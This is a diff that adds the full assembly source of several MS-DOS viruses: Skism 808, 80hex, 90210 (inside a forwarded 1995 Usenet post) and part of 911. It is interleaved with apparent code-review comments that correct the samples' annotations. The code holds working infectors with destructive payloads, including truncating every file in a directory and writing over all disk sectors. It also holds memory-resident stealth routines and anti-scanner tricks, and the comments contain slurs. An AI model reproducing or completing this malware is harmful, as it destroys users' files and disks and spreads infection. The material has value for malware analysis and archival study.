@@ -0,0 +1,306 @@ + +;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS. + + + +FILENAME equ 30 ;USED TO FIND FILE NAME +FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES +FILEDATE equ 24 ;USED TO FIND FILE DATE +FILETIME equ 22 ;USED TO FIND FILE TIME + + + +CODE_START equ 0100H ;START OF ALL .com FILES +VIRUS_SIZE equ 808 ;tr 808 + + +CODE SEGMENT 'CODE' +ASSUME CS:CODE,DS:CODE,ES:CODE + ORG CODE_START + +MAIN PROC NEAR + +JMP VIRUS_START + +ENCRYPT_VAL DB 00H + +VIRUS_START: + + CALL ENCRYPT ;ENCRYPT/DECRYPT FILE + JMP VIRUS ;GO TO START OF CODE + +ENCRYPT: + + PUSH CX + MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA + +XOR_LOOP: + + MOV CH,[BX] ;READ CURRENT BYTE + XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY + MOV [BX],CH ;SWITCH BYTES + INC BX ;MOVE BX UP A BYTE + CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE + ;ARE WE DONE WITH THE ENCRYPTION + JLE XOR_LOOP ;NO? KEEP GOING + POP CX + RET + + +INFECTFILE: + + MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY + MOV BX,HANDLE ;LOAD BX WITH HANDLE + PUSH BX ;SAVE HANDLE ON STACK + CALL ENCRYPT ;ENCRYPT FILE + POP BX ;GET BACK BX + MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE + MOV AH,40H ;WRITE TO FILE + INT 21H ; + PUSH BX + CALL ENCRYPT ;FIX UP THE MESS + POP BX + RET + +VIRUS_CODE: + +WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT +FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT +FILESPEC2 DB "*.*",0 +ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY +DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta +FILEDATA DB 43 DUP (?) ;HOLDS FILES dta +DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT +DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET +TEMPOFS DW ? ;HOLDS OFFSET +TEMPSEG DW ? ;HOLDS SEGMENT +DRIVECODE DB ? ;HOLDS DRIVE CODE +CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS +HANDLE DW ? ;HOLDS FILE HANDLE +ORIG_TIME DW ? ;HOLDS FILE TIME +ORIG_DATE DW ? ;HOLDS FILE DATE +ORIG_ATTR DW ? ;HOLDS FILE ATTR +IDBUFFER DW 2 DUP (?) 
;HOLDS VIRUS ID + +VIRUS: + + MOV AX,3000H ;GET DOS VERSION + INT 21H ; + CMP AL,02H ;IS IT AT LEAST 2.00? + JB BUS1 ;WON'T INFECT LESS THAN 2.00 + MOV AH,2CH ;GET TIME + INT 21H ; + MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO + ;THERES 100 MUTATIONS POSSIBLE +SETDTA: + + MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA + MOV AH,1AH ;SET DTA ADDRESS + INT 21H ; + +NEWDIR: + + MOV AH,19H ;GET DRIVE CODE + INT 21H ; + MOV DL,AL ;SAVE DRIVECODE + INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER + MOV AH,47H ;GET CURRENT DIRECTORY + MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN + INT 21H ; + + MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY + MOV AH,3BH ;CHANGE DIRECTORY TO ROOT + INT 21H ; + +SCANDIRS: + + MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS + MOV DX, OFFSET WILDCARDS ;LOOK FOR '*' + MOV AH,4EH ;FIND FIRST FILE + INT 21H ; + CMP AX,12H ;NO FIRST FILE? + JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT + +BUS1: + + JMP BUS + +DIRLOOP: + + MOV AH,4FH ;FIND NEXT FILE + INT 21H ; + CMP AX,12H + JE BUS ;NO MORE DIRS FOUND, ROLL OUT + +CHDIR: + + MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME + MOV AH,3BH ;CHANGE DIRECTORY + INT 21H ; + + MOV AH,2FH ;GET CURRENT DTA ADDRESS + INT 21H ; + MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT + MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET + MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA + MOV AH,1AH ;SET DTA ADDRESS + INT 21H ; + +SCANDIR: + + MOV CX,07H ;FIND ANY ATTRIBUTE + MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0 + MOV AH,4EH ;FIND FIRST FILE FUNCTION + INT 21H ; + CMP AX,12H ;WAS FILE FOUND? 
+ JNE TRANSFORM + +NEXTEXE: + + MOV AH,4FH ;FIND NEXT FILE + INT 21H ; + CMP AX,12H ;NONE FOUND + JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO + + MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY + MOV AH,3BH ;CHANGE DIRECTORY TO ROOT + INT 21H ; + MOV AH,1AH ;SET DTA ADDRESS + MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT + MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET + INT 21H ; + JMP DIRLOOP + + +BUS: + + JMP ROLLOUT + +TRANSFORM: + + MOV AH,2FH ;TEMPORALLY STORE DTA + INT 21H ; + MOV [TEMPSEG],ES ;SAVE OLD SEGMENT + MOV [TEMPOFS],BX ;SAVE OLD OFFSET + MOV DX, OFFSET FILEDATA + FILENAME + + MOV BX,OFFSET FILEDATA ;SAVE FILE... + MOV AX,[BX]+FILEDATE ;DATE + MOV ORIG_DATE,AX ; + MOV AX,[BX]+FILETIME ;TIME + MOV ORIG_TIME,AX ; AND + MOV AX,[BX]+FILEATTR ; + MOV AX,4300H + INT 21H + MOV ORIG_ATTR,CX + MOV AX,4301H ;CHANGE ATTRIBUTES + XOR CX,CX ;CLEAR ATTRIBUTES + INT 21H ; + MOV AX,3D00H ;OPEN FILE - READ + INT 21H ; + JC FIXUP ;ERROR - FIND ANOTHER FILE + MOV HANDLE,AX ;SAVE HANDLE + MOV AH,3FH ;READ FROM FILE + MOV BX,HANDLE ;MOVE HANDLE TO BX + MOV CX,02H ;READ 2 BYTES + MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER + INT 21H ; + + MOV AH,3EH ;CLOSE FILE FOR NOW + MOV BX,HANDLE ;LOAD BX WITH HANDLE + INT 21H ; + + MOV BX, IDBUFFER ;FILL BX WITH ID STRING + CMP BX,02EBH ;INFECTED? 
+ JNE DOIT ;SAME - FIND ANOTHER FILE + + +FIXUP: + MOV AH,1AH ;SET DTA ADDRESS + MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT + MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET + INT 21H ; + JMP NEXTEXE + + +DOIT: + + MOV DX, OFFSET FILEDATA + FILENAME + MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS + INT 21H ; + MOV HANDLE,AX ;SAVE HANDLE + + CALL INFECTFILE + + ;MOV AX,3EH ;CLOSE FILE + ;INT 21H + +ROLLOUT: + + MOV AX,5701H ;RESTORE ORIGINAL + MOV BX,HANDLE ; + MOV CX,ORIG_TIME ;TIME AND + MOV DX,ORIG_DATE ;DATE + INT 21H ; + + MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES + MOV CX,ORIG_ATTR + MOV DX,OFFSET FILEDATA + FILENAME + INT 21H + ;MOV BX,HANDLE + ;MOV AX,3EH ;CLOSE FILE + ;INT 21H + MOV AH,3BH ;TRY TO FIX THIS + MOV DX,OFFSET ROOTDIR ;FOR SPEED + INT 21H ; + MOV AH,3BH ;CHANGE DIRECTORY + MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL + INT 21H ; + MOV AH,2AH ;CHECK SYSTEM DATE + INT 21H ; + CMP CX,1991 ;IS IT AT LEAST 1991? + JB AUDI ;NO? DON'T DO IT NOW + CMP DL,25 ;IS IT THE 25TH? + JB AUDI ;NOT YET? QUIT + CMP AL,5 ;IS fRIDAY? + JNE AUDI ;NO? QUIT + MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA + MOV AH,1AH ;SET DTA ADDRESS + INT 21H ; + MOV AH,4EH ;FIND FIRST FILE + MOV CX,7H ; + MOV DX,OFFSET FILESPEC2 ;OFFSET *.* + +lOOPS: + + INT 21H ; + JC AUDI ;ERROR? THEN QUIT + MOV AX,4301H ;FIND ALL NORMAL FILES + XOR CX,CX ; + INT 21H ; + MOV DX,OFFSET DIRDATA + FILENAME + MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR + INT 21H ; + JC AUDI ;ERROR? QUIT + MOV AH,4FH ;FIND NEXT FILE + JMP LOOPS ; + +AUDI: + + MOV AX,4C00H ;END PROGRAM + INT 21H ; + +;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T +;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION. + + +WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0 +WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. 
",0 +WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0 +WORDS4 DB " yOU SISSYS.....",0 + +MAIN ENDP +CODE ENDS + END MAIN + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.80hex.asm b/MSDOS/Virus.MSDOS.Unknown.80hex.asm new file mode 100644 index 00000000..bcd6163a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.80hex.asm 
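Review bot: The comments disagree with the code in ways that matter for classification: `FILESPEC` is `"*.exe"` while the `SCANDIR` comment says `"*.com",0`, and the `JNE DOIT` after `CMP BX,02EBH` is annotated `;SAME - FIND ANOTHER FILE` although the jump is taken when the 2-byte marker does not match (i.e. the file is not yet infected). `INFECTFILE` never seeks or preserves the original bytes — it writes `VIRUS_SIZE` bytes at offset 0 of a freshly opened handle — so this is an overwriting infector of EXE files, not a .COM appender, and after the single `CALL INFECTFILE` control falls into `ROLLOUT`, one file per run. I would correct those two comments and add `; overwrites the first 808 bytes of one *.exe per run; host is destroyed` near `INFECTFILE`. `MOV AX,[BX]+FILEATTR` is a dead load — the next instruction replaces AX with 4300h.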
@@ -0,0 +1,87 @@ +; ------------------------------------------------------------------------------ +; - 80hex virus - +; (c) 1994 The Unforgiven/Immortal Riot + +; Pay-Load function: +; This will be dropped to the file c:\dos\keyb.com, that often +; is called from autoexec.bat, which will result in that all files +; in DOS being overwritten. Eventually all hds will be trashed as well. + +; General-information: +; It's a simple overwriting virus, BUT not released 'alone' as +; the purpose as a virus that will infect systems and travel +; around the world. It's rather an original pay-load, outsmarted +; by my creative/destructive brain. + +; It's not encrypted, still *NO* anti-virus detects it, this is probably +; due to its simplistic shape. It's *highly* destructive, and is really +; more or less a trojan. But it can replicate, so... + +; Greetings to all destructive virus writers! +; - The Unforgiven/Immortal Riot + + + ;Riot.trivial.80h + +.model tiny +.code +org 100h + +start: +dec byte ptr offset files ; tricking tbscan ! +add ah,4eh ; tricking f-prot ! +mov dx, offset files +next: int 21h + +jnc open + +mov ah,2ch ; Value of 1/100 of a second +int 21h +cmp dl,79 ; 20% +jb quit ; + +mov al,2h + +drive: ; Harddrive, seek and destroy! +mov cx,1 +lea bx,virus +cwd ; clear dx (ax = <8000h) +Next_Sector: +int 26h +inc dx +jnc next_sector ; all sectors +inc al +jmp short drive ; all drives + +quit: +ret + +open: +inc byte ptr offset files + +add ax,3d02h +mov dx, offset 9eh +int 21h + +write: +xchg ax,bx + +mov ah,40h +mov dx, offset start +mov cx, endoffile - start +int 21h + +close: +sub ah,2 +int 21h + +mov ah,4fh +jmp short next + +data: +files db "+.*",0 ; => *.* +virus db "Materialism - the religion of today, " +truth db "ain't it sad?" + +endoffile: +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.90210.asm b/MSDOS/Virus.MSDOS.Unknown.90210.asm new file mode 100644 index 00000000..6c7fe8aa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.90210.asm 
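Review bot: `add ah,4eh` relies on AH being zero at .COM entry, which DOS only guarantees when the PSP's FCB drive letters are valid (AL/AH are FFh otherwise), and the file states no such assumption; running the sample under a different loader changes what the first `int 21h` does. The header should say so, e.g. `; assumes AH=0 at entry (DOS .COM convention, FCB drives valid) -> AH=4Eh find-first`. The `20%` comment on `cmp dl,79` is also slightly off: DL is hundredths of a second (0-99), so `jb quit` lets 21 of 100 values through. The `Riot.trivial.80h` line is the only name given for the sample; a comment tying it to the `80hex` title would help cross-referencing.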
@@ -0,0 +1,377 @@ +From smtp Tue Feb 7 13:13 EST 1995 +Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:13 EST +Received: by lynx.dac.neu.edu (8.6.9/8.6.9) + id NAA30823 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:16:19 -0500 +Date: Tue, 7 Feb 1995 13:16:19 -0500 +From: lynx.dac.neu.edu!ekilby (Eric Kilby) +Content-Length: 8866 +Content-Type: text +Message-Id: <199502071816.NAA30823@lynx.dac.neu.edu> +To: pobox.jwu.edu!joshuaw +Subject: (fwd) 90210 +Newsgroups: alt.comp.virus +Status: O + +Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!usenet.cis.ufl.edu!caen!uwm.edu!news.alpha.net!solaris.cc.vt.edu!uunet!ankh.iia.org!danishm +From: danishm@iia.org () +Newsgroups: alt.comp.virus +Subject: 90210 +Date: 5 Feb 1995 21:55:07 GMT +Organization: International Internet Association. +Lines: 345 +Message-ID: <3h3hfr$sb@ankh.iia.org> +NNTP-Posting-Host: iia.org +X-Newsreader: TIN [version 1.2 PL2] + +Here is the 90210 virus: + +;90210 Virus from the TridenT virus research group. + +;This is a semi-stealth virus that hides file-size changes while +;it is in memory. It marks the files w/the timestamp. It will +;infect COM files on open, execute, delete, and rename. It checks +;if it is in memory by calling Int 21h with DEADh in AX and uses MCB's +;to go memory resident. + +;Disassembly by Black Wolf + +.model tiny +.code + + org 100h + +start: + push ax + call GetOffset + +GetOffset: + pop bp + sub bp,offset GetOffset-start + + mov ax,0DEADh + int 21h ;Are we installed? + cmp ax,0AAAAh + je DoneInstall + + mov ax,3521h + int 21h ;Get int 21 address + + db 2eh, 89h,9eh,77h,0h ;mov cs:[OldInt21-start+bp],bx + db 2eh, 8ch, 86h, 79h, 0 ;mov word ptr cs:[OldInt21-start+2+bp],es + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:[0],'Z' + jne DoneInstall ;Are we the last block in chain? 
+ + mov ax,ds:[3] ;Get MCB size + sub ax,38h ;subtract virus memory size + jc DoneInstall ;exit if virus > MCB + + mov ds:[3],ax ;Set MCB size + ;sub word ptr ds:[12h],38h ;Subtract virus mem from + db 81h,2eh,12h,0,38h,0 ;top of memory in PSP + + mov si,bp + mov di,0 + mov es,ds:[12h] ;Get top of memory from PSP + push cs + pop ds + mov cx,287h + cld + rep movsb ;Copy virus into memory + + mov ax,2521h + push es + pop ds + mov dx,offset Int21Handler-start + int 21h ;Set int 21h + +DoneInstall: + mov di,100h + lea si,[bp+Storage_Bytes-start] + push cs + push cs + pop ds + pop es + cld + movsw + movsb ;Restore Host file. + mov bx,offset start + pop ax + push bx + retn ;Return to Host + + +VirusName db '[90210 BH]' + +OldInt21: + dw 0 + dw 0 + +Int21Handler: + cmp ax,0DEADh ;Install Check? + jne NotInstall + mov ax,0AAAAh + iret +NotInstall: + + cmp ah,11h ;FCB find first + je FCBSearch + cmp ah,12h ;FCB find next + je FCBSearch + cmp ah,4Eh ;handle find first + je HandleSearch + cmp ah,4Fh ;handle find next + je HandleSearch + + push ax bx cx dx si di bp ds es + + cmp ah,3Dh ;handle file open + je SetupNameCheck + cmp ax,4B00h ;file execute + je SetupNameCheck + cmp ah,41h ;handle file delete + je SetupNameCheck + cmp ah,43h ;get/set attributes + je SetupNameCheck + cmp ah,56h ;rename file + je SetupNameCheck + + cmp ah,0Fh ;Open file w/FCB + je TryToInfect + cmp ah,23h + je TryToInfect ;Get file size + jmp ExitInfect + +FCBSearch: + jmp FCBStealth +HandleSearch: + jmp HandleStealth + +TryToInfect: + db 89h,0d6h ;mov si,dx + + inc si + push cs + pop es + mov di,offset ds:[Filename-start] ;Copy filename + mov cx,8 + rep movsb + mov cx,3 + inc di + rep movsb + + mov dx,Filename-start + push cs + pop ds + +SetupNameCheck: + db 89h, 0d6h ;mov si,dx + mov cx,100h + cld + +Find_Extension: + lodsb + cmp al,'.' ;Find '.' 
+ je CheckFilename + loop Find_Extension + db 0e9h, 13h, 0 ;jmp FilenameBad +CheckFilename: + lodsw + or ax,2020h ;Set to lowercase + cmp ax,6F63h ;Is it a com file? + jne FilenameBad + lodsb + or al,20h + cmp al,6Dh + jne FilenameBad + db 0e9h, 3, 0 ;jmp InfectFile + +FilenameBad: + jmp ExitInfect + +InfectFile: + push dx + push ds + mov ax,4300h + pushf + call dword ptr cs:[OldInt21-start] ;Get Attributes + mov word ptr cs:[FileAttribs-start],cx ;Save them + + mov ax,4301h + xor cx,cx + pushf + call dword ptr cs:[OldInt21-start] ;Reset Attribs to 0 + + mov ax,3D02h + pushf + call dword ptr cs:[OldInt21-start] ;Open file + jnc OpenGood + jmp FileClosed + +OpenGood: + xchg ax,bx + mov ax,5700h + pushf + call dword ptr cs:[OldInt21-start] ;Get file time/date + mov word ptr cs:[FileTime-start],cx ;save time + mov word ptr cs:[FileDate-start],dx ;save date + + and cx,1Fh + cmp cx,1Fh + jne NotInfected ;Check infection + db 0e9h, 76h, 0 ;jmp Close_File +NotInfected: + mov ah,3Fh + push cs + pop ds + mov dx,Storage_Bytes-start + mov cx,3 + pushf + call dword ptr cs:[OldInt21-start] ;Read in first 3 bytes + + cmp word ptr cs:[Storage_Bytes-start],5A4Dh + je DoneWithFile ;Is it an .EXE file? + + cmp word ptr cs:[Storage_Bytes-start],4D5Ah + je DoneWithFile ;Alternate EXE sig? + + mov ax,4202h + xor cx,cx + xor dx,dx + pushf + call dword ptr cs:[OldInt21-start] ;Go end of file. 
+ + sub ax,3 ;Save jump size + mov word ptr cs:[Jump_Bytes-start+1],ax + + mov ah,40h + push cs + pop ds + mov dx,0 + mov cx,287h + pushf + call dword ptr cs:[OldInt21-start] ;Append virus to file + + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h ;go back to beginning + + mov ah,40h + mov dx,Jump_Bytes-Start + mov cx,3 + pushf + call dword ptr cs:[OldInt21-start] ;Write in jump + or word ptr cs:[FileTime-start],1Fh ;Mark as infected + +DoneWithFile: + mov ax,5701h + mov cx,word ptr cs:[FileTime-start] + mov dx,word ptr cs:[FileDate-start] + pushf + call dword ptr cs:[OldInt21-start] ;Restore File Date/Time + +Close_File: + mov ah,3Eh + pushf + call dword ptr cs:[OldInt21-start] ;Close file + + pop ds + pop dx ;Pop filename address + push dx + push ds + mov ax,4301h + mov cx,ds:[FileAttribs-start] + pushf + call dword ptr cs:[OldInt21-start] ;Restore attributes + +FileClosed: + pop ds + pop dx + +ExitInfect: + pop es ds bp di si dx cx bx ax + jmp dword ptr cs:[OldInt21-start] ;Jump back into Int 21h + +GetDTA: + pop si + pushf + push ax bx es + mov ah,2Fh + call CallInt21 + jmp si + +FCBStealth: + call CallInt21 + cmp al,0 ;Did call work? + jne NoStealth + call GetDTA + cmp byte ptr es:[bx],0FFh ;Extended FCB? + jne AfterFCBAdjust + add bx,8 + +AfterFCBAdjust: + mov al,es:[bx+16h] ;Get time stamp + and al,1Fh + cmp al,1Fh ;infected? + jne DoneFCBStealth + + sub word ptr es:[bx+1Ch],287h ;Subtract virus size + sbb word ptr es:[bx+1Eh],0 ;adjust for carry + jmp short ResetTime + +HandleStealth: + call CallInt21 + jc NoStealth + call GetDTA + mov al,es:[bx+16h] ;Get file time + and al,1Fh + cmp al,1Fh + jne DoneFCBStealth + sub word ptr es:[bx+1Ah],287h ;Subtract virus size + sbb word ptr es:[bx+1Ch],0 ;adjust for carry + +ResetTime: + xor byte ptr es:[bx+16h],10h ;Restore time to norm. 
+ +DoneFCBStealth: + pop es bx ax + popf + +NoStealth: + retf 2 + +CallInt21: + pushf + call dword ptr cs:[OldInt21-start] + retn + +Storage_Bytes: + nop + int 21h + +Filename db 8 dup (0) + db '.' +Extension db 3 dup (0) + db 0 + +FileAttribs dw 0 +FileTime dw 0 +FileDate dw 0 + +Jump_Bytes db 0E9h, 00h, 00h + +AuthorName db ' John Tardy / TridenT ' + +end start + + +-- +Eric "Mad Dog" Kilby maddog@ccs.neu.edu +The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu +Student at the Northeatstern University College of Computer Science +"I Can't Believe It's Not Butter" + diff --git a/MSDOS/Virus.MSDOS.Unknown.911.asm b/MSDOS/Virus.MSDOS.Unknown.911.asm new file mode 100644 index 00000000..a696f1f1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.911.asm 
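Review bot: The mail/NNTP envelope at the top of the file (`From smtp Tue Feb 7 ...` through `Here is the 90210 virus:`) and the four-line signature after `end start` are not assembler syntax, so the file will not assemble as committed; either strip that text or prefix it with `;` if the provenance is worth keeping. For anyone analysing the sample: at `Close_File` the code does `pop ds` / `pop dx` to recover the filename pointer and then `mov cx,ds:[FileAttribs-start]`, which reads the saved attribute word relative to the caller's DS rather than CS (where `mov word ptr cs:[FileAttribs-start],cx` stored it), so the AX=4301h restore uses an unrelated word unless DS already equals CS, which is only the FCB path that did `push cs` / `pop ds` before `SetupNameCheck`. That appears to be a defect in the original rather than the disassembly, and a comment such as `; NOTE: reads via DS, not CS - restored attributes are unreliable on the handle-call paths` would save the next reader the trace.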
@@ -0,0 +1,631 @@ +PAGE 59,132 + +; +; +; 911 Virus +; +; This program is the 911 Virus. Use at your own risk. When the +; manipulation task begins, it will dial 911 through your modem +; and display "Support Your Police" on the screen. +; +; Assemble under Borland's Turbo Asm 2.x +; Link - ignore no stack segment error +; run EXE2BIN 911.EXE 911.COM +; +; And remember ... Don't Get Caught. +; +; + +data_1e equ 0FE12h ;* +data_2e equ 437h ;* +data_3e equ 438h ;* +psp_envirn_seg equ 2Ch +psp_cmd_size equ 80h +psp_cmd_tail equ 81h +data_37e equ 541h ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 100h + +v911 proc far + +start: + jmp loc_40 + +v911 endp + +; +; +; External Entry Point +; +; + +int_21h_entry proc far + pushf ; Push flags + cmp ah,0E0h + jne loc_3 ; Jump if not equal + mov ax,0DADAh + popf ; Pop flags + iret ; Interrupt return +int_21h_entry endp + +loc_3: + cmp ah,0E1h + jne loc_4 ; Jump if not equal + mov ax,cs + popf ; Pop flags + iret ; Interrupt return +loc_4: + cmp ax,4B00h + je loc_7 ; Jump if equal +loc_5: + popf ; Pop flags + jmp dword ptr cs:data_5 +data_5 dd 29A138Dh +data_7 dd 70022Bh +data_9 db 0 +data_10 db 8 +data_11 db 10h +data_12 db 9 +data_13 db 34h +data_14 dw 0 + db 0 +data_15 db 0 +data_16 db 0 +data_17 db 0 +data_18 db 43h + db 4Fh, 4Dh +data_19 dw 5 +data_20 dw 2 + db 0, 0 +data_21 dw 1301h +data_22 dw 12ACh +data_23 dw 0FFFEh +data_24 dw 9B70h +data_25 dw 3D5Bh +data_26 dw 20h +data_27 dw 0EC2h +data_28 dw 6E68h + db 00h, 00h, 81h, 00h +data_29 dw 12ACh + db 5Ch, 00h +data_30 dw 12ACh + db 6Ch, 00h +data_31 dw 12ACh +loc_7: + push ds + push bx + push si + push cx + push ax + push dx + push bp + push es + push di + cld ; Clear direction + push dx + push ds + xor cx,cx ; Zero register + mov si,dx +loc_8: + mov al,[si] + cmp al,0 + je loc_9 ; Jump if equal + inc cx + inc si + jmp short loc_8 +loc_9: + add dx,cx + sub dx,3 + mov si,offset data_18 + mov di,dx + cmp byte ptr [di-3],4Eh ; 'N' + jne loc_10 ; Jump if 
not equal + cmp byte ptr [di-2],44h ; 'D' + je loc_13 ; Jump if equal +loc_10: + mov cx,3 + +locloop_11: + mov al,cs:[si] + cmp al,[di] + jne loc_13 ; Jump if not equal + inc si + inc di + loop locloop_11 ; Loop if cx > 0 + + pop ds + pop dx + push dx + push ds + mov si,dx + mov dl,0 + cmp byte ptr [si+1],3Ah ; ':' + jne loc_12 ; Jump if not equal + mov dl,[si] + and dl,0Fh +loc_12: + mov ah,36h ; '6' + int 21h ; DOS Services ah=function 36h + ; get drive info, drive dl,1=a: + ; returns ax=clust per sector + ; bx=avail clust,cx=bytes/sect + ; dx=clusters per drive + cmp ax,0FFFFh + je loc_13 ; Jump if equal + jmp short loc_15 + db 90h +loc_13: + jmp loc_21 + jmp loc_22 +loc_14: + jmp loc_19 + jmp loc_20 +loc_15: + cmp bx,3 + jb loc_13 ; Jump if below + pop ds + pop dx + push ds + push dx + mov cs:data_24,ds + mov cs:data_25,dx + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + mov cs:data_26,cx + mov ax,4301h + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + mov bx,0FFFFh + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov cs:data_21,ax + mov ax,cs + mov ds,ax + mov dx,data_37e + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + pop dx + pop ds + mov ax,3D02h + clc ; Clear carry flag + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_14 ; Jump if carry Set + mov bx,ax + mov cs:data_19,ax + mov cx,0FFFFh + mov ax,cs:data_21 + mov ds,ax + mov dx,data_2e + mov ah,3Fh ; '?' 
+ clc ; Clear carry flag + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + jc loc_14 ; Jump if carry Set + mov cs:data_20,ax + cmp ax,0E000h + ja loc_14 ; Jump if above + cmp ax,437h + jb loc_17 ; Jump if below + mov si,data_3e + add si,si + sub si,15h + mov cx,13h + mov di,offset data_35 + +locloop_16: + mov al,[si] + mov ah,cs:[di] + cmp ah,al + jne loc_17 ; Jump if not equal + inc si + inc di + loop locloop_16 ; Loop if cx > 0 + + jmp short loc_19 + db 90h +loc_17: + mov ax,4200h + mov bx,cs:data_19 + xor cx,cx ; Zero register + mov dx,cx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_19 ; Jump if carry Set + mov si,100h + mov cx,437h + xor di,di ; Zero register + mov ax,cs:data_21 + mov ds,ax + +locloop_18: + mov al,cs:[si] + mov [di],al + inc si + inc di + loop locloop_18 ; Loop if cx > 0 + + mov ax,5700h + mov bx,cs:data_19 + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + mov cs:data_28,cx + mov cs:data_27,dx + mov ax,cs:data_21 + mov ds,ax + mov si,data_2e + mov al,[si] + add al,0Bh + mov [si],al + xor dx,dx ; Zero register + mov cx,cs:data_20 + add cx,437h + mov bx,cs:data_19 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov cx,cs:data_28 + mov dx,cs:data_27 + mov bx,cs:data_19 + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_19: + mov bx,cs:data_19 + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push cs + pop ds +loc_20: + mov dx,psp_cmd_size + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + mov ax,cs:data_21 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ax,cs:data_24 + mov ds,ax + mov 
dx,cs:data_25 + mov ax,4301h + mov cx,cs:data_26 + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jmp short loc_22 + db 90h +loc_21: + pop ds + pop dx + jmp short loc_22 + db 90h +loc_22: + pop di + pop es + pop bp + pop dx + pop ax + pop cx + pop si + pop bx + pop ds + jmp loc_5 + +; +; +; External Entry Point +; +; + +int_08h_entry proc far + push bp + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + pushf ; Push flags + call cs:data_7 + call sub_1 + push cs + pop ds + mov ah,5 + mov ch,data_11 + cmp ah,ch + ja loc_24 ; Jump if above + mov ah,6 + cmp ah,ch + jb loc_24 ; Jump if below + mov ah,data_9 + cmp ah,1 + je loc_23 ; Jump if equal + mov ah,1 + mov data_9,ah + jmp short loc_24 + db 90h +loc_23: + call sub_2 + inc data_14 + mov ax,data_14 + cmp ax,21Ch + jne loc_24 ; Jump if not equal + xor ax,ax ; Zero register + mov data_9,ah + mov data_14,ax + mov data_16,ah +loc_24: + pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + pop 